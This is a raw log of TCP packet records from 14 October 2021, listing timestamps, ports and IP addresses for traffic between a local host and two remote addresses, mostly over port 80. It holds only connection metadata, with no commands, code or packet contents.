Oct 14, 2021 08:40:49.128799915 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.128819942 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.128866911 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.128911018 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.128916979 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.129040956 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129081011 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.129086971 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129121065 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.129133940 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129179955 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129256010 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129291058 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.129302979 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129350901 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129395962 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129411936 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.129441023 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129450083 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.129548073 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.129611015 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.129626036 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129673958 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129720926 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129766941 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129800081 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.129812002 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.129853964 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.129903078 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.129951000 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130034924 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130085945 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130131006 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130176067 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130177975 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130225897 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130250931 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130275011 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130300045 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130323887 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130347013 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130394936 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130439043 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130440950 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130486965 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130486965 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130532026 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130536079 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130578995 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130584955 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130625010 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130634069 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130671024 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130682945 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130717039 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130732059 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130764008 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130808115 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130810022 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130856037 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130871058 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130902052 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130925894 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130948067 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.130973101 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.130994081 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131021976 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131040096 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131071091 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131087065 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131119967 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131130934 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131134033 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131181002 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131222010 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131226063 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131269932 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131273031 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131319046 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131323099 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131364107 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131371021 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131409883 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131455898 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131457090 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131504059 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131525993 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131591082 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131602049 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131680965 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131685972 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131751060 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131762028 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131799936 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131843090 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131844997 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131891012 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131891012 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131937027 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.131978035 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.131983042 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132031918 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132035017 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132077932 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132095098 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132123947 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132177114 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132184982 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132232904 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132250071 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132328987 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132330894 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132386923 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132427931 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132432938 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132478952 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132492065 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132524967 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132539988 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132571936 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132617950 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132663012 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132715940 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132760048 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132771015 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132778883 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132791042 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132808924 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132857084 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.132874012 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.132956982 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133030891 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133039951 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133093119 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133138895 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133157015 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133167028 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133183956 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133229971 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133255005 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133270979 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133291960 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133337975 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133358955 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133383989 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133430004 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133440018 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133450985 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133517027 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133554935 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133580923 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133605003 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133625031 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133629084 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133675098 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133702040 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133721113 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133722067 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133769035 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.133816957 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.133915901 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.154452085 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.154596090 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.154654980 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.154664040 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.154701948 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.154748917 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.154793024 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.154800892 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.154838085 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.154860020 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.154884100 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.154930115 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.154970884 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.154974937 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.155021906 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.155066013 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.155111074 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.155155897 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.155154943 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.155194044 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.155201912 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.155204058 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.155247927 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.155314922 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.155354023 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.155364037 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.155373096 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.155510902 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:50.160814047 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:54.315562010 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:40:54.338835955 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:40:54.544290066 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:40:55.713442087 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.734335899 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.734486103 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.734740019 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.755177975 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.757066011 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.757129908 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.757179022 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.757225037 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.757252932 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.757270098 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.757318020 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.757363081 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.757389069 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.757407904 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.757421970 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.757453918 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.757500887 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.757560015 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.757575035 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.757584095 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.757591963 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.757602930 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.757734060 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.757744074 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.778264046 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778405905 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778454065 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778453112 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.778500080 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778546095 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778590918 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778652906 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778697968 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778717041 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.778740883 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.778743982 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778748989 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.778791904 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778836966 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778882980 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778883934 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.778907061 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.778928041 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.778971910 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.779016018 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.779061079 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.779061079 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.779083967 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.779093027 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.779100895 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.779107094 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.779109001 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.779151917 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.779196978 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.779238939 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.779242992 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.779262066 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.779395103 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.779403925 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.779412985 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.779421091 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.800079107 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800189972 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800263882 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800323009 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800328016 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.800417900 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800503016 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800506115 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.800544977 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.800553083 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800600052 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800645113 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800682068 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.800690889 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800720930 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.800736904 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800782919 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800828934 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800858974 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.800873995 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800898075 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.800909996 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.800923109 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.800968885 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801013947 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801035881 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801059008 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801074982 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801084995 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801095963 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801109076 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801155090 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801201105 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801213026 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801245928 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801251888 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801263094 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801271915 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801280022 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801292896 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801338911 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801366091 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801384926 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801388025 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801433086 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801477909 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801522970 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801522970 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801533937 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801570892 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801616907 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801662922 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801700115 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801707983 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801711082 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801721096 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801728964 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801737070 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801755905 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801801920 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801867008 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801887989 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801901102 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801909924 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.801934004 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.801980019 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.802025080 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.802068949 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.802098989 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.802114010 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.802138090 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.802148104 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.802275896 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.802448034 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.802486897 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.802498102 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.823095083 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.823317051 CEST	80	49811	83.167.224.147	192.168.11.20
